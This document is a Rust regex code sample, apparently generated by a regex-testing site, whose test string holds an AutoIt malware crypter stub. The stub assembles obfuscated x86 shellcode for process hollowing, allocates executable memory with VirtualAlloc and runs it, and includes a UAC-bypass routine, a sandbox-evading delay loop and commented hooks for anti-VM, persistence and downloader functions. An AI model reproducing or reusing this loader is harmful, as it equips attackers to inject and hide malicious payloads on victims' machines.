// include the latest version of the regex crate in your Cargo.toml
extern crate regex;
use regex::Regex;
fn main() {
let regex = Regex::new(r"(?m)$[a-zA-Z0-9_]+").unwrap();
let string = "Execute(\"Opt(\"\"TrayIconHide\"\", 1)\")
;~ Call(\"CustomAntiVM\")
;~ Call(\"CustomAntiSandbox\")
;~ Call(\"CustomDelay\")
;~ Call(\"CustomStartup\")
;~ Call(\"CustomDownloader\")
;~ Call(\"CustomUACBypass\")
Global $ProcessId
Global $XWNFIUYHFDUH = Execute('%INJECTION%')
Call(\"Hollowing\",$XWNFIUYHFDUH, \"\", GetResources())
;~ Call(\"CustomMeltFile\")
;~ Call(\"CustomPersistence\")
Func Hollowing($wPath, $wArguments, $lpFile)
Local $ojnkoeyrcwxlutoux = \"0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC56578B7D0833F657E8D7FFFFFF8B\"
Local $kxghsiqvahwxnq = $ojnkoeyrcwxlutoux & \"C885C974200FBE07C1E60403F08BC625000000F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5D\"
Local $sdqpidmqtyxkecrfsp = $kxghsiqvahwxnq & \"C20400558BEC51515356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B401803\"
Local $wtzfkbwb = $sdqpidmqtyxkecrfsp & \"CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F\"
Local $xonwcuofeidefqludikidnevpgau = $wtzfkbwb & \"5E5B8BE55DC208008B45F80FB704708B048303C7EBE9558BEC81ECF003000053565733FF897DB8648B35\"
Local $qntpthgycxwcvzxicnjfif = $xonwcuofeidefqludikidnevpgau & \"300000008B760C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B368B761889\"
Local $bbrnxjj = $qntpthgycxwcvzxicnjfif & \"75C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8C7855CFFFFFF794A8A0B898524FFFFFF\"
Local $shvtuoronlyjnrglhmeqvsbwvl = $bbrnxjj & \"8D45B0898528FFFFFF8D45A489852CFFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538\"
Local $llryfjxokqaibkgtpblwvnuqjat = $shvtuoronlyjnrglhmeqvsbwvl & \"FFFFFF8D45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D4594898548FFFFFF8D45C4\"
Local $tnzfzyidgxogpmyh = $llryfjxokqaibkgtpblwvnuqjat & \"89854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFFEE38830CC78564FFFFFF5764E101C78568FF\"
Local $qlzltjbdzlyqxqbpfpdakkbj = $tnzfzyidgxogpmyh & \"FFFF18E4CA08C7856CFFFFFFE3CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFF\"
Local $shawavvjwgeejpajlvgozrfp = $qlzltjbdzlyqxqbpfpdakkbj & \"E4C7B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427230FC7458CE86F180D\"
Local $wzbzixxgjpsmjfddpp = $shawavvjwgeejpajlvgozrfp & \"898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45B850E842FEFFFF8B8CB520FFFFFF890185C00F84\"
Local $urmwfppupodnjbbkzbuvayjx = $wzbzixxgjpsmjfddpp & \"910300004683FE0E7CD28BDF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000\"
Local $utwnzgscykxocatlkoiicwgrlzg = $urmwfppupodnjbbkzbuvayjx & \"8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB74614897DF8897DBC8945D039\"
Local $bjtoviobltcuiva = $utwnzgscykxocatlkoiicwgrlzg & \"BEA0000000741139BEA40000007409F6461601750333FF4733D2897DF433C08955EC6639110F94C03D4D\"
Local $ozemhyijlmqavynfcazqtevbgoz = $bjtoviobltcuiva & \"5A00000F840E03000033C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100000F\"
Local $hritzmbigny = $ozemhyijlmqavynfcazqtevbgoz & \"84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508FF55A485C00F84AD0200008D85\"
Local $ritzicfhsdx = $hritzmbigny & \"10FCFFFF50FF75DCFF55A085C00F84980200006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF55\"
Local $ozujehkdcgtyardsqotqhsd = $ritzicfhsdx & \"9485C00F84780200008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A406800300000FF7650\"
Local $irxtwsvzvwjd = $ozujehkdcgtyardsqotqhsd & \"6A00FF55988BD885DB0F84450200006A406800300000FF7650FF7634FF75D8FF55C08945F885C0753B85\"
Local $izqhuxcksyjsifkptzmq = $irxtwsvzvwjd & \"FF0F84230200006A406800300000FF765033FFC745EC0100000057FF75D8FF55C08945F885C075146800\"
Local $wvlrhnnkhhxcrnutzgzsehlki = $izqhuxcksyjsifkptzmq & \"8000005753FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B4606732C8B7DD0\"
Local $elrig = $wvlrhnnkhhxcrnutzgzsehlki & \"83C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4DF08D7F280FB7460641894DF03BC87CDC8B\"
Local $fwjshmnzzhkr = $elrig & \"7B3C8B45F803FB837DEC008947340F848A000000837DF4000F84800000008B97A00000008365F40003D3\"
Local $dlbgbukrqnzulokbidbwcbbbsy = $fwjshmnzzhkr & \"83BFA400000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685C0742B25FF0F0000\"
Local $ghfzgrimeajcdqgrpswogsclqwf = $dlbgbukrqnzulokbidbwcbbbsy & \"03028945EC8BC88B46342904198B4DF08B47340FB74C4A0881E1FF0F0000030A0104198B4DF08B420441\"
Local $npcjancoclqgimzkks = $ghfzgrimeajcdqgrpswogsclqwf & \"83E808894DF0D1E83BC872BB8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8\"
Local $galpkljedrneujjluxcqj = $npcjancoclqgimzkks & \"FF75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC85C00F84E4FEFFFF33C0\"
Local $oabegzlochissjwuxeqavj = $galpkljedrneujjluxcqj & \"897DF4663B4606736C8B7DD083C73C03FE8B07A900000020741985C079046A40EB172500000040F7D81B\"
Local $kbxqhwwr = $oabegzlochissjwuxeqavj & \"C083E01083C010EB1585C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E803\"
Local $bitjszjlemxpbjembznrx = $kbxqhwwr & \"45F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC8729E33FF68008000005753FF55\"
Local $slpnfpagpsoslgayirw = $bitjszjlemxpbjembznrx & \"C485C00F845BFEFFFF576A048D45F8508B85B4FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46\"
Local $klzedfibwlphj = $slpnfpagpsoslgayirw & \"280345F88985C0FCFFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C00F840D\"
Local $etixewnk = $klzedfibwlphj & \"FEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB050F8677FCFFFF33C05F5E5B8BE5\"
Local $N1 = $etixewnk & \"5DC20C00\"
Local $lpShellcode = DllCall(\"kernel32\", \"ptr\", \"VirtualAlloc\", \"dword\", 0, \"dword\", BinaryLen($N1), \"dword\", 0x3000, \"dword\", 0x40)[0]
Local $File_Struct = DllStructCreate(\"byte lpfile[\" & StringLen($lpFile) & \"]\")
BitAND(DllStructSetData(DllStructCreate(\"byte shellcode[\" & BinaryLen($N1) & \"]\", $lpShellcode), \"shellcode\", $N1),DllStructSetData($File_Struct, \"lpfile\", $lpFile))
$ProcessId = DllCallAddress(\"dword\", $lpShellcode + \"0xBE\", \"wstr\", $wPath, \"wstr\", $wArguments, \"ptr\", DllStructGetPtr($File_Struct))[0]
EndFunc
;~ %OPT%
Func CustomUACBypass()
Local $ejifuhzuieh = Execute(BinaryToString(\"0x497341646d696e2829\"))
Local $QSZUIEHZ = \"WIN_10\"
Local $ONUHBFE = \"WIN_7\"
If Not $ejifuhzuieh Then
Local $QSDJSI = @OSVersion
If $QSDJSI == $QSZUIEHZ Then
CustomWin10Elevation()
ElseIf $QSDJSI == $ONUHBFE Then
CustomWin7Elevation()
EndIf
EndIf
EndFunc
Func CDEL($SLTIME,$SLEOO)
For $i = 0 To $SLEOO
DllCall(\"kernel32.dll\", \"none\", \"Sleep\", \"dword\", $SLTIME/ $SLEOO)
$avar = 999
While $avar == 999
$avar = $avar + 1 * $avar - 1 ^ 405 + $avar * $avar
$avar = 11200
WEnd
Next
EndFunc";
// result will be an iterator over tuples containing the start and end indices for each match in the string
let result = regex.captures_iter(string);
for mat in result {
println!("{:?}", mat);
}
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Rust, please visit: https://docs.rs/regex/latest/regex/